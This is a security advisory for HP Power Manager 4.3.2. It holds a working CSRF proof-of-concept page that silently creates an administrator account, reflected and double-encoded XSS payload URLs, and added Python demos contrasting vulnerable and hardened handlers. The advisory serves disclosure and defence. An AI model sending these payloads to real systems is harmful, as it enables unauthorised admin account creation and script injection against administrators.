Thursday, 19 April 2012

HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Posted on 05:52 by freda
Description
HP Power Manager (HPPM) is a web-based application that enables administrators to manage an HP UPS from a browser-based management console. Administrators can monitor, manage, and control a single UPS locally and remotely.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in HP Power Manager. These issues were discovered in a default installation of HP Power Manager 4.3.2; earlier versions may also be affected.


Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<!-- Hidden form posting to the HPPM user-management handler. When a logged-in
     HPPM administrator loads this page, the browser attaches the HPPM session
     cookie to the request and the handler accepts it. -->
<form action="http://[target]/goform/formSetUsers" id="csrf" method="post">
<input type="hidden" name="name9" value="attacker" />     <!-- new account name -->
<input type="hidden" name="pass9" value="passwd123" />    <!-- password -->
<input type="hidden" name="rpass9" value="passwd123" />   <!-- password confirmation -->
<input type="hidden" name="admin9" value="on" />          <!-- administrator flag -->
<input type="hidden" name="actionType" value="1" />       <!-- action selector used by the form -->
</form>
<script>
/* submit automatically, no user interaction needed */
document.getElementById('csrf').submit();
</script>
</body>
</html>
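To show what the PoC above relies on, and what a handler needs in order to stop it, the following is an added Python example; it is not HP's code and does not reproduce HPPM's real handler. A constructed formSetUsers-style handler authorises on the session cookie alone (the behaviour the PoC exploits) and sits beside a hardened version that additionally requires a per-session synchronizer token in the form body and a same-origin Origin/Referer header. The console origin, cookie name, in-memory session store and request objects are all assumptions made for the example.

```python
"""CSRF demo for a formSetUsers-style handler (added example, not HP's code).

The vulnerable handler mirrors what the PoC relies on: the browser attaches
the victim's session cookie to a cross-site POST and the server authorises
on that cookie alone.  The hardened handler also requires a per-session
synchronizer token and a same-origin Origin/Referer header.  Host name,
cookie name, session store and request objects are constructed here.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

SITE_ORIGIN = "http://hppm.example.internal"  # assumed management-console origin
COOKIE_NAME = "HPPMSESSION"                   # assumed session cookie name


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    form: dict


@dataclass
class Session:
    user: str
    is_admin: bool
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


SESSIONS = {}  # cookie value -> Session (constructed in-memory store)


def login(user, is_admin):
    """Issue a session cookie; in HPPM this would happen at the login page."""
    cookie = secrets.token_urlsafe(16)
    SESSIONS[cookie] = Session(user, is_admin)
    return cookie


def session_for(request):
    for part in request.headers.get("Cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == COOKIE_NAME:
            return SESSIONS.get(value)
    return None


def apply_set_users(form, users):
    """The state change the PoC triggers: add a user, optionally as admin."""
    if form.get("actionType") != "1":
        return 400
    users[form["name9"]] = form.get("admin9") == "on"
    return 200


def form_set_users_vulnerable(request, users):
    """Cookie-only authorisation: a cross-site POST carrying the cookie succeeds."""
    session = session_for(request)
    if request.method != "POST" or session is None or not session.is_admin:
        return 403
    return apply_set_users(request.form, users)


def same_origin(request):
    """Origin (Referer as fallback) must match the console's own origin."""
    src = request.headers.get("Origin") or request.headers.get("Referer")
    if not src:
        return False  # strict: state-changing POSTs must carry one of them
    p = urlparse(src)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def form_set_users_hardened(request, users):
    """Same authorisation plus synchronizer token and origin check."""
    session = session_for(request)
    if request.method != "POST" or session is None or not session.is_admin:
        return 403
    token = request.form.get("csrf_token", "")
    if not hmac.compare_digest(token, session.csrf_token) or not same_origin(request):
        return 403
    return apply_set_users(request.form, users)


def forged_request(cookie):
    """The POST the PoC page makes the logged-in victim's browser send."""
    return Request("POST", "/goform/formSetUsers",
                   {"Cookie": f"{COOKIE_NAME}={cookie}", "Origin": "http://attacker.example"},
                   {"name9": "attacker", "pass9": "passwd123", "rpass9": "passwd123",
                    "admin9": "on", "actionType": "1"})


def legitimate_request(cookie):
    """A POST from the console's own page, which can embed the session token."""
    return Request("POST", "/goform/formSetUsers",
                   {"Cookie": f"{COOKIE_NAME}={cookie}", "Origin": SITE_ORIGIN},
                   {"name9": "operator", "pass9": "S3cret!", "rpass9": "S3cret!",
                    "admin9": "off", "actionType": "1",
                    "csrf_token": SESSIONS[cookie].csrf_token})


def demo():
    cookie = login("admin", True)
    vuln_users, hard_users = {"admin": True}, {"admin": True}
    forged_vs_vulnerable = form_set_users_vulnerable(forged_request(cookie), vuln_users)
    forged_vs_hardened = form_set_users_hardened(forged_request(cookie), hard_users)
    legit_vs_hardened = form_set_users_hardened(legitimate_request(cookie), hard_users)
    return forged_vs_vulnerable, forged_vs_hardened, legit_vs_hardened, vuln_users, hard_users
```

Calling demo() shows the forged request creating the "attacker" admin account against the cookie-only handler, the same request being refused by the hardened handler (no token, foreign Origin), and a console-originated request with the session token still succeeding. The token comparison uses hmac.compare_digest so that a wrong token cannot be distinguished from a right one by timing; the origin check is a second, independent layer for browsers that send Origin or Referer.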

Cross-Site Scripting (XSS)
====================

  • http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2&SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2"%20onMouseOver%3dalert%281%29%2f%2f&SORTORD=2&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e

All four are reflected XSS in query parameters. The exportlogs.asp and pagehelp.asp payloads are double URL-encoded (%253c is the encoding of %3c, which in turn encodes <), so they only fire if the application decodes the parameter a second time before reflecting it. The applicationlogs.asp payloads instead close a quoted attribute value with " and inject an onMouseOver handler.
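The following added Python example (not HP's code, and not HPPM's real templates) works through the two reflection contexts the PoC URLs imply. It takes the first two PoC URLs verbatim, decodes the parameters the way a query-string parser would (with a second decode for the double-encoded logType value, an assumption drawn from the PoC), renders them into a constructed body template and a constructed quoted-attribute template, and inspects the result with an HTML parser to show that the raw interpolation yields a script tag or an event-handler attribute while HTML-encoding the value does not.

```python
"""Reflected-XSS demo built from the PoC URLs (added example, not HP's code).

Two reflection contexts are modelled from what the PoC URLs imply:
  * exportlogs.asp / pagehelp.asp reflect the parameter into the page body;
    their payloads are double percent-encoded, so the application is assumed
    to decode the value a second time before reflecting it;
  * applicationlogs.asp reflects SORTCOL / SORTORD inside a quoted attribute,
    which is why that payload closes the quote and adds an onMouseOver handler.
The templates below are constructed for the example; nothing is HPPM's markup.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote_plus

# PoC URLs from the advisory, copied verbatim ("[target]" is the advisory's placeholder)
POC_BODY_URL = ("http://[target]/contents/exportlogs.asp?logType="
                "Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e")
POC_ATTR_URL = ('http://[target]/contents/applicationlogs.asp?SORTCOL=2'
                '&SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20')


def query_param(url, name):
    """Percent-decode once, as a web server does for query-string parameters."""
    query = url.split("?", 1)[1]  # split manually: "[target]" is not a parseable host
    return parse_qs(query).get(name, [""])[0]


# Constructed templates: the vulnerable ones interpolate the raw value,
# the safe ones HTML-encode it (quote=True also encodes " for attributes).
def render_body_vulnerable(log_type):
    return f"<h2>Log type: {log_type}</h2>"


def render_body_safe(log_type):
    return f"<h2>Log type: {html.escape(log_type, quote=True)}</h2>"


def render_attr_vulnerable(sortord):
    return f'<a href="applicationlogs.asp?SORTCOL=2&amp;SORTORD={sortord}">Sort</a>'


def render_attr_safe(sortord):
    safe = html.escape(sortord, quote=True)
    return f'<a href="applicationlogs.asp?SORTCOL=2&amp;SORTORD={safe}">Sort</a>'


class Inspector(HTMLParser):
    """Counts <script> start tags and on* event-handler attributes in markup."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, _ in attrs:
            if name.startswith("on"):
                self.event_handlers.append((tag, name))


def inspect_markup(markup):
    """Return (number of script tags, [(tag, on* attribute), ...])."""
    p = Inspector()
    p.feed(markup)
    p.close()
    return p.script_tags, p.event_handlers


def demo():
    # Second decode is an assumption drawn from the double-encoded PoC payload.
    log_type = unquote_plus(query_param(POC_BODY_URL, "logType"))
    sortord = query_param(POC_ATTR_URL, "SORTORD")
    results = {
        "body_vulnerable": inspect_markup(render_body_vulnerable(log_type)),
        "body_safe": inspect_markup(render_body_safe(log_type)),
        "attr_vulnerable": inspect_markup(render_attr_vulnerable(sortord)),
        "attr_safe": inspect_markup(render_attr_safe(sortord)),
    }
    return log_type, sortord, results
```

demo() returns the decoded payloads (the body one becomes a literal script element, the attribute one becomes `2" onMouseOver=alert(1)//`) together with the inspection results: the raw body render contains a script tag, the raw attribute render gives the anchor an onmouseover attribute, and both encoded renders contain neither. The point for the fix is context-aware output encoding at the reflection point; the decoding step shows why an input filter that only looks for a literal < would miss the double-encoded variant.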

Solution
HP recommends the following workarounds. They reduce exposure but rely on operator behaviour and network placement rather than removing the CSRF or XSS flaws from the application:

  • Open a browser instance, log on to HPPM, perform the needed task, and log off from HPPM.
  • Do not visit untrusted web sites while logged on to HPPM.
  • Use a firewall to limit access to HPPM.

References

Vendor URL: http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131
Secunia: http://secunia.com/advisories/43058/

Disclosure Timeline
2011-01-25 - CSRF Vulnerability discovered.
2011-01-25 - CSRF Vulnerability reported to Secunia.
2011-01-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-07 - HP released recommendation for CSRF.
2011-02-08 - Advisory published by Secunia.
2011-02-10 - XSS Vulnerability discovered.
2011-02-10 - XSS Vulnerability reported to Secunia.
2011-02-10 - Secunia confirmed the vulnerability and contacted the vendor.
2011-03-09 - HP released recommendation for XSS.
2011-03-10 - Advisory updated by Secunia.